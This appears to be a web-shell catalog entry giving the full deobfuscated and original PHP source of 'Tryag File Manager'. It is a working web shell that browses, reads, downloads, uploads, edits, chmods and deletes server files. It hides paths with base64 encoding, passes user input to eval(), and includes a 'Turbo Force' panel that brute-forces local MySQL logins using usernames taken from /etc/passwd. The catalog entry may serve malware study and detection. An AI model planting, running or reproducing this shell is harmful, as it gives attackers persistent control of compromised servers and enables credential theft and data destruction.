Back to listFilename: ffdd.php
Tags
Encoding- base64_decode
- base64_encode
URLsEmailsTitleExecutionInputEnvironment- set_time_limit
- error_reporting
- getcwd
Files- file_get_contents
- move_uploaded_file
Deobfuscated code
<?php
error_reporting(0);
set_time_limit(0);
extract(start());
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
$_POST['path'] = isset($_POST['path']) ? g22b_crypt($_POST['path'], 'de') : false;
$_POST['name'] = isset($_POST['name']) ? g22b_crypt($_POST['name'], 'de') : false;
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Tryag File Manager</title>
<meta name="robots" content="noindex" />
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
margin: 0;
}
#container{
width: 700px;
margin: 20px auto;
border: 1px solid black;
}
@font-face {
font-family: \'Racing Sans One\';
font-style: normal;
font-weight: 400;
src: local(\'Racing Sans One\'), local(\'RacingSansOne-Regular\'), url(http://g22b.cc/upload/1r3DpWaCiT7y3PD4KgkNyK3fkYX5z1QtDUdIWoaaD_k.woff) format(\'woff\');
}
#header{
text-align: center;
border-bottom: 1px dotted black;
}
#header h1{
margin: 0;
}
#nav,#menu{
padding-top: 5px;
margin-left: 5px;
padding-bottom: 5px;
overflow: hidden;
border-bottom: 1px dotted black;
}
#nav{
margin-bottom: 10px;
}
#menu{
text-align: center;
}
#content{
margin: 0;
}
#content table{
width: 700px;
margin: 0px;
}
#content table .first{
background-color: silver;
text-align: center;
}
#content table .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
#content table tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#footer{
margin-top: 10px;
border-top: 1px dotted black;
}
#footer p{
margin: 5px;
text-align: center;
}
.filename,a{
color: #000;
text-decoration: none;
cursor: pointer;
}
.filename:hover,a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
.center{
text-align: center;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<script>
function Encoder(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
</script>
</head>
<body>
<div id="container">
<div id="header"><h1>Tryag File Manager</h1></div>
<div id="menu"><a href="?path=' . $currentpathen . '">Home</a> - <a href="?path=' . $currentpathen . '&cpanel">Turbo Force</a></div>
<div id="nav">
<div class="path">Current Path : ' . nav_link() . '</div>
<div class="upload">
<form enctype="multipart/form-data" method="POST" action="?path=' . $currentpathen . '&up">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</div>
<div class="new">
<form method="POST" action="?path=' . $currentpathen . '&new" onSubmit="Encoder(\'c\')">
<span>New : </span><input name="name" type="text" size="10" id="c" />
File <input type="radio" name="type" value="file" checked/>
Dir <input type="radio" name="type" value="dir" />
<input type="submit" value="Create" />
</form>
</div>
</div>
<div id="content">';
if (isset($_GET['cpanel'])) {
if (isset($_POST['usernames']) && isset($_POST['passwords'])) {
$usernames = base64_decode($_POST['usernames']);
$passwords = base64_decode($_POST['passwords']);
$count = 0;
foreach (explode("\n", $usernames) as $username) {
$username = $_POST['type'] == 'simple' ? $username : passwdtouser($username);
foreach (explode("\n", $passwords) as $password) {
$username = trim($username);
$password = trim($password);
$co = mysql_connect('localhost', $username, $password);
if ($co) {
mysql_close($co);
echo "Tryag~ Username (<font color=red>{$username}</font>) Password (<font color=red>{$password}</font>)<br />";
$count++;
}
}
}
echo "{$count} Usernames Founded.";
} else {
echo "<form method=\"POST\" onSubmit=\"Encoder('c');Encoder('b');\">\r\n Usernames : <br />\r\n <textarea cols=84 rows=10 id=\"c\" name=\"usernames\"></textarea><br />\r\n Passwords : <br />\r\n <textarea cols=84 rows=10 id=\"b\" name=\"passwords\"></textarea><br />\r\n Usernames Type : Simple : <input type=\"radio\" name=\"type\" value=\"simple\" checked=\"checked\"> - /etc/passwd : <input type=\"radio\" name=\"type\" value=\"pass\">\r\n <br /><input type=\"submit\" value=\"Go\">\r\n </form>";
}
} else {
if (isset($_GET['filesrc'])) {
$file = g22b_crypt($_GET['filesrc'], 'de');
echo '<div class="center">' . htmlspecialchars($file) . '</div><textarea cols="84" rows="25">' . filesrc($file) . '</textarea></pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete' || isset($_GET['new']) && $_POST['type'] == 'file') {
echo '<div class="center">' . $_POST['name'] . '<br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
eval('$perm = ' . $_POST['perm'] . ';');
if (chmod($_POST['path'], $perm)) {
echo "<font color=\"green\">Change Permission Done.</font><br />";
$permdone = true;
} else {
echo "<font color=\"red\">Change Permission Error.</font><br />";
}
}
if ($permdone) {
$perm = $_POST['perm'];
} else {
$perm = substr(sprintf('%o', fileperms($_POST['path'])), -4);
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . $perm . '" />
<input type="hidden" name="path" value="' . g22b_crypt($_POST['path'], 'en') . '">
<input type="hidden" name="name" value="' . g22b_crypt($_POST['name'], 'en') . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $currentpath . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Change Name Done.</font><br />";
$_POST['name'] = $_POST['newname'];
} else {
echo "<font color=\"red\">Change Name Error.</font><br />";
}
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . g22b_crypt($_POST['path'], 'en') . '">
<input type="hidden" name="name" value="' . g22b_crypt($_POST['name'], 'en') . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit' || isset($_GET['new'])) {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, base64_decode($_POST['src']))) {
echo "<font color=\"green\">Edit File Done.</font><br />";
$done = true;
} else {
echo "<font color=\"red\">Edit File Error.</font><br />";
}
fclose($fp);
}
if (isset($_GET['new']) && !$done) {
$filecontent = '';
$_POST['path'] = "{$currentpath}/{$_POST['name']}";
} else {
$filecontent = filesrc($_POST['path']);
}
echo '<form method="POST" onSubmit="Encoder(\'c\')">
<textarea cols="84" rows="25" name="src" id="c">' . $filecontent . '</textarea><br />
<input type="hidden" name="path" value="' . g22b_crypt($_POST['path'], 'en') . '">
<input type="hidden" name="name" value="' . g22b_crypt($_POST['name'], 'en') . '">
<input type="hidden" name="type" value="file" />
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo "</div>";
} else {
echo "<div class=\"center\">";
if ($_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"green\">Delete Dir Done.</font><br />";
} else {
echo "<font color=\"red\">Delete Dir Error.</font><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
} elseif ($_POST['type'] == 'dir' && isset($_GET['new'])) {
if (mkdir("{$currentpath}/{$_POST['name']}")) {
echo "<font color=\"green\">Create Dir Done.</font><br />";
} else {
echo "<font color=\"red\">Create Dir Error.</font><br />";
}
} elseif (isset($_FILES['file'])) {
$userfile_name = $currentpath . '/' . $_FILES['file']['name'];
$userfile_tmp = $_FILES['file']['tmp_name'];
if (move_uploaded_file($userfile_tmp, $userfile_name)) {
echo "<font color=\"green\">File Upload Done.</font><br />";
} else {
echo "<font color=\"red\">File Upload Error.</font><br />";
}
}
echo "</div><table>\r\n <tr class=\"first\">\r\n <td>Name</td>\r\n <td>Size</td>\r\n <td>Permissions</td>\r\n <td>Options</td>\r\n </tr>";
$dirs = getfiles('dir');
foreach ($dirs as $dir) {
echo '<div id="dirs"><tr>
<td><a href="?path=' . $dir['link'] . '"><div class="filename">' . $dir['name'] . '</div></a></td>
<td class="center">' . $dir['size'] . '</td>
<td class="center"><font color="' . $dir['permcolor'] . '">' . $dir['perm'] . '</font></td>
<td class="center"><form method="POST" action="?path=' . $currentpathen . '&option">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="' . g22b_crypt($dir['name'], 'en') . '">
<input type="hidden" name="path" value="' . $dir['link'] . '">
<input type="submit" value=">" />
</form></td>
</tr>
</div>';
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
$files = getfiles('file');
foreach ($files as $file) {
echo '<div id="files">
<tr>
<td><a href="?path=' . $currentpathen . '&filesrc=' . $file['link'] . '"><div class="filename">' . $file['name'] . '</div></a></td>
<td class="center">' . $file['size'] . '</td>
<td class="center"><font color="' . $file['permcolor'] . '">' . $file['perm'] . '</font></td>
<td class="center"><form method="POST" action="?path=' . $currentpathen . '&option">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="' . g22b_crypt($file['name'], 'en') . '">
<input type="hidden" name="path" value="' . $file['link'] . '">
<input type="submit" value=">" />
</form></td>
</tr></div>';
}
echo "</table>";
}
}
echo "</div>\r\n <div id=\"footer\"><p>Tryag File Manager Version <font color=\"red\">2.0</font>, Coded By <font color=\"red\">G-B</font><br />Email: <font color=\"red\">anonymousiq87@gmail.com</font></p></div>\r\n </div>\r\n \r\n</body>\r\n</html>";
function getfiles($type)
{
global $currentpath;
$dir = scandir($currentpath);
$result = array();
foreach ($dir as $file) {
$current['fullname'] = "{$currentpath}/{$file}";
if ($type == 'dir') {
if (!is_dir($current['fullname']) || $file == '.' || $file == '..') {
continue;
}
} elseif ($type == 'file') {
if (!is_file($current['fullname'])) {
continue;
}
}
$current['name'] = $file;
$current['link'] = g22b_crypt($current['fullname'], 'en');
$current['size'] = is_dir($current['fullname']) ? '--' : file_size($current['fullname']);
$current['perm'] = perms($current['fullname']);
if (is_writable($current['fullname'])) {
$current['permcolor'] = 'green';
} elseif (is_readable($current['fullname'])) {
$current['permcolor'] = '';
} else {
$current['permcolor'] = 'red';
}
$result[] = $current;
}
return $result;
}
function start()
{
global $_POST, $_GET;
$result['currentpath'] = isset($_GET['path']) ? g22b_crypt($_GET['path'], 'de') : cwd();
$result['currentpathen'] = isset($_GET['path']) ? $_GET['path'] : g22b_crypt(cwd(), 'en');
return $result;
}
function file_size($file)
{
$size = filesize($file) / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
return $size;
}
function g22b_crypt($txt, $type)
{
if (function_exists('base64_encode') && function_exists('base64_decode')) {
return $type == 'en' ? base64_encode($txt) : base64_decode($txt);
} elseif (function_exists('strlen') && function_exists('dechex') && function_exists('ord') && function_exists('chr') && function_exists('hexdec')) {
return $type == 'en' ? strToHex($txt) : hexToStr($txt);
} else {
$ar1 = array('public_html', '.htaccess', '/', '.');
$ar2 = array('bbbpubghostbbb', 'bbbhtaghostbbb', 'bbbsghostbbb', 'bbbdotghostbbb');
return $type == 'en' ? str_replace($ar1, $ar2, $txt) : str_replace($ar2, $ar1, $txt);
}
}
function strToHex($string)
{
$hex = '';
for ($i = 0; $i < strlen($string); $i++) {
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
function hexToStr($hex)
{
$string = '';
for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
$string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
return $string;
}
function nav_link()
{
global $currentpath;
$path = $currentpath;
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
$result = '';
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
$result .= '<a href="?path=' . g22b_crypt("/", 'en') . '">/</a>';
continue;
}
if ($pat == '') {
continue;
}
$result .= '<a href="?path=';
$linkpath = '';
for ($i = 0; $i <= $id; $i++) {
$linkpath .= "{$paths[$i]}";
if ($i != $id) {
$linkpath .= "/";
}
}
$result .= g22b_crypt($linkpath, 'en');
$result .= '">' . $pat . '</a>/';
}
return $result;
}
function filesrc($file)
{
return htmlspecialchars(file_get_contents($file));
}
function cwd()
{
if (function_exists('getcwd')) {
return getcwd();
} else {
$e = str_replace("\\", "/", $path);
$e = explode('/', $path);
$result = '';
for ($i = 0; $i < count($e) - 1; $i++) {
if ($e[$i] == '') {
continue;
}
$result .= '/' . $e[$i];
}
return $result;
}
}
function passwdtouser($line)
{
$user = explode(':', $line);
return $user[0];
}
function perms($file)
{
$perms = @fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
Original code
<?php
error_reporting(0);
set_time_limit(0);
extract(start());
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
$_POST['path'] = (isset($_POST['path'])) ? g22b_crypt($_POST['path'],'de') : false;
$_POST['name'] = (isset($_POST['name'])) ? g22b_crypt($_POST['name'],'de') : false;
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Tryag File Manager</title>
<meta name="robots" content="noindex" />
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
margin: 0;
}
#container{
width: 700px;
margin: 20px auto;
border: 1px solid black;
}
@font-face {
font-family: \'Racing Sans One\';
font-style: normal;
font-weight: 400;
src: local(\'Racing Sans One\'), local(\'RacingSansOne-Regular\'), url(http://g22b.cc/upload/1r3DpWaCiT7y3PD4KgkNyK3fkYX5z1QtDUdIWoaaD_k.woff) format(\'woff\');
}
#header{
text-align: center;
border-bottom: 1px dotted black;
}
#header h1{
margin: 0;
}
#nav,#menu{
padding-top: 5px;
margin-left: 5px;
padding-bottom: 5px;
overflow: hidden;
border-bottom: 1px dotted black;
}
#nav{
margin-bottom: 10px;
}
#menu{
text-align: center;
}
#content{
margin: 0;
}
#content table{
width: 700px;
margin: 0px;
}
#content table .first{
background-color: silver;
text-align: center;
}
#content table .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
#content table tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#footer{
margin-top: 10px;
border-top: 1px dotted black;
}
#footer p{
margin: 5px;
text-align: center;
}
.filename,a{
color: #000;
text-decoration: none;
cursor: pointer;
}
.filename:hover,a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
.center{
text-align: center;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<script>
function Encoder(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
</script>
</head>
<body>
<div id="container">
<div id="header"><h1>Tryag File Manager</h1></div>
<div id="menu"><a href="?path='.$currentpathen.'">Home</a> - <a href="?path='.$currentpathen.'&cpanel">Turbo Force</a></div>
<div id="nav">
<div class="path">Current Path : '.nav_link().'</div>
<div class="upload">
<form enctype="multipart/form-data" method="POST" action="?path='.$currentpathen.'&up">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</div>
<div class="new">
<form method="POST" action="?path='.$currentpathen.'&new" onSubmit="Encoder(\'c\')">
<span>New : </span><input name="name" type="text" size="10" id="c" />
File <input type="radio" name="type" value="file" checked/>
Dir <input type="radio" name="type" value="dir" />
<input type="submit" value="Create" />
</form>
</div>
</div>
<div id="content">';
if(isset($_GET['cpanel'])){
if(isset($_POST['usernames']) && isset($_POST['passwords'])){
$usernames = base64_decode($_POST['usernames']);
$passwords = base64_decode($_POST['passwords']);
$count = 0;
foreach(explode("\n",$usernames) as $username){
$username = ($_POST['type'] == 'simple') ? $username : passwdtouser($username);
foreach(explode("\n",$passwords) as $password){
$username = trim($username);
$password = trim($password);
$co = mysql_connect('localhost',$username,$password);
if($co){
mysql_close($co);
echo "Tryag~ Username (<font color=red>$username</font>) Password (<font color=red>$password</font>)<br />";
$count++;
}
}
}
echo "$count Usernames Founded.";
}else{
echo '<form method="POST" onSubmit="Encoder(\'c\');Encoder(\'b\');">
Usernames : <br />
<textarea cols=84 rows=10 id="c" name="usernames"></textarea><br />
Passwords : <br />
<textarea cols=84 rows=10 id="b" name="passwords"></textarea><br />
Usernames Type : Simple : <input type="radio" name="type" value="simple" checked="checked"> - /etc/passwd : <input type="radio" name="type" value="pass">
<br /><input type="submit" value="Go">
</form>';
}
}else{
if(isset($_GET['filesrc'])){
$file = g22b_crypt($_GET['filesrc'],'de');
echo '<div class="center">'.htmlspecialchars($file).'</div><textarea cols="84" rows="25">'.filesrc($file).'</textarea></pre>';
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete' || (isset($_GET['new']) && $_POST['type'] == 'file')){
echo '<div class="center">'.$_POST['name'].'<br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
eval('$perm = '.$_POST['perm'].';');
if(chmod($_POST['path'],$perm)){
echo '<font color="green">Change Permission Done.</font><br />';
$permdone = true;
}else{
echo '<font color="red">Change Permission Error.</font><br />';
}
}
if($permdone){
$perm = $_POST['perm'];
}else{
$perm = substr(sprintf('%o', fileperms($_POST['path'])), -4);
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.$perm.'" />
<input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
<input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$currentpath.'/'.$_POST['newname'])){
echo '<font color="green">Change Name Done.</font><br />';
$_POST['name'] = $_POST['newname'];
}else{
echo '<font color="red">Change Name Error.</font><br />';
}
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
<input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit' || isset($_GET['new'])){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,base64_decode($_POST['src']))){
echo '<font color="green">Edit File Done.</font><br />';
$done = true;
}else{
echo '<font color="red">Edit File Error.</font><br />';
}
fclose($fp);
}
if(isset($_GET['new']) && !$done){
$filecontent = '';
$_POST['path'] = "$currentpath/$_POST[name]";
}else{
$filecontent = filesrc($_POST['path']);
}
echo '<form method="POST" onSubmit="Encoder(\'c\')">
<textarea cols="84" rows="25" name="src" id="c">'.$filecontent.'</textarea><br />
<input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
<input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
<input type="hidden" name="type" value="file" />
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</div>';
}else{
echo '<div class="center">';
if($_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Dir Done.</font><br />';
}else{
echo '<font color="red">Delete Dir Error.</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Done.</font><br />';
}else{
echo '<font color="red">Delete File Error.</font><br />';
}
}
}elseif($_POST['type'] == 'dir' && isset($_GET['new'])){
if(mkdir("$currentpath/$_POST[name]")){
echo '<font color="green">Create Dir Done.</font><br />';
}else{
echo '<font color="red">Create Dir Error.</font><br />';
}
}elseif(isset($_FILES['file'])){
$userfile_name = $currentpath.'/'.$_FILES['file']['name'];
$userfile_tmp = $_FILES['file']['tmp_name'];
if(move_uploaded_file($userfile_tmp,$userfile_name)){
echo '<font color="green">File Upload Done.</font><br />';
}else{
echo '<font color="red">File Upload Error.</font><br />';
}
}
echo '</div><table>
<tr class="first">
<td>Name</td>
<td>Size</td>
<td>Permissions</td>
<td>Options</td>
</tr>';
$dirs = getfiles('dir');
foreach($dirs as $dir){
echo '<div id="dirs"><tr>
<td><a href="?path='.$dir['link'].'"><div class="filename">'.$dir['name'].'</div></a></td>
<td class="center">'.$dir['size'].'</td>
<td class="center"><font color="'.$dir['permcolor'].'">'.$dir['perm'].'</font></td>
<td class="center"><form method="POST" action="?path='.$currentpathen.'&option">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.g22b_crypt($dir['name'],'en').'">
<input type="hidden" name="path" value="'.$dir['link'].'">
<input type="submit" value=">" />
</form></td>
</tr>
</div>';
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
$files = getfiles('file');
foreach($files as $file){
echo '<div id="files">
<tr>
<td><a href="?path='.$currentpathen.'&filesrc='.$file['link'].'"><div class="filename">'.$file['name'].'</div></a></td>
<td class="center">'.$file['size'].'</td>
<td class="center"><font color="'.$file['permcolor'].'">'.$file['perm'].'</font></td>
<td class="center"><form method="POST" action="?path='.$currentpathen.'&option">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.g22b_crypt($file['name'],'en').'">
<input type="hidden" name="path" value="'.$file['link'].'">
<input type="submit" value=">" />
</form></td>
</tr></div>';
}
echo '</table>';
}
}
echo '</div>
<div id="footer"><p>Tryag File Manager Version <font color="red">2.0</font>, Coded By <font color="red">G-B</font><br />Email: <font color="red">anonymousiq87@gmail.com</font></p></div>
</div>
</body>
</html>';
function getfiles($type){
global $currentpath;
$dir = scandir($currentpath);
$result = array();
foreach($dir as $file){
$current['fullname'] = "$currentpath/$file";
if($type == 'dir'){
if(!is_dir($current['fullname']) || $file == '.' || $file == '..') continue;
}elseif($type == 'file'){
if(!is_file($current['fullname'])) continue;
}
$current['name'] = $file;
$current['link'] = g22b_crypt($current['fullname'],'en');
$current['size'] = (is_dir($current['fullname'])) ? '--' : file_size($current['fullname']);
$current['perm'] = perms($current['fullname']);
if(is_writable($current['fullname'])){
$current['permcolor'] = 'green';
}elseif(is_readable($current['fullname'])){
$current['permcolor'] = '';
}else{
$current['permcolor'] = 'red';
}
$result[] = $current;
}
return $result;
}
function start(){
global $_POST,$_GET;
$result['currentpath'] = (isset($_GET['path'])) ? g22b_crypt($_GET['path'],'de') : cwd();
$result['currentpathen'] = (isset($_GET['path'])) ? $_GET['path'] : g22b_crypt(cwd(),'en');
return $result;
}
function file_size($file){
$size = filesize($file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
return $size;
}
function g22b_crypt($txt,$type){
if(function_exists('base64_encode') && function_exists('base64_decode')){
return ($type == 'en') ? base64_encode($txt) : base64_decode($txt);
}elseif(function_exists('strlen') && function_exists('dechex') && function_exists('ord') && function_exists('chr') && function_exists('hexdec')){
return ($type == 'en') ? strToHex($txt) : hexToStr($txt);
}else{
$ar1 = array('public_html','.htaccess','/','.');
$ar2 = array('bbbpubghostbbb','bbbhtaghostbbb','bbbsghostbbb','bbbdotghostbbb');
return ($type == 'en') ? str_replace($ar1,$ar2,$txt) : str_replace($ar2,$ar1,$txt);
}
}
function strToHex($string){
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
function hexToStr($hex){
$string='';
for ($i=0; $i < strlen($hex)-1; $i+=2)
{
$string .= chr(hexdec($hex[$i].$hex[$i+1]));
}
return $string;
}
function nav_link(){
global $currentpath;
$path = $currentpath;
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
$result = '';
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
$result .= '<a href="?path='.g22b_crypt("/",'en').'">/</a>';
continue;
}
if($pat == '') continue;
$result .= '<a href="?path=';
$linkpath = '';
for($i=0;$i<=$id;$i++){
$linkpath .= "$paths[$i]";
if($i != $id) $linkpath .= "/";
}
$result .= g22b_crypt($linkpath,'en');
$result .= '">'.$pat.'</a>/';
}
return $result;
}
function filesrc($file){
return htmlspecialchars(file_get_contents($file));
}
function cwd(){
if(function_exists('getcwd')){
return getcwd();
}else{
$e = str_replace("\\","/",$path);
$e = explode('/',$path);
$result = '';
for($i=0;$i<count($e)-1;$i++){
if($e[$i] == '') continue;
$result .= '/'.$e[$i];
}
return $result;
}
}
function passwdtouser($line){
$user = explode(':',$line);
return $user[0];
}
function perms($file){
$perms = @fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>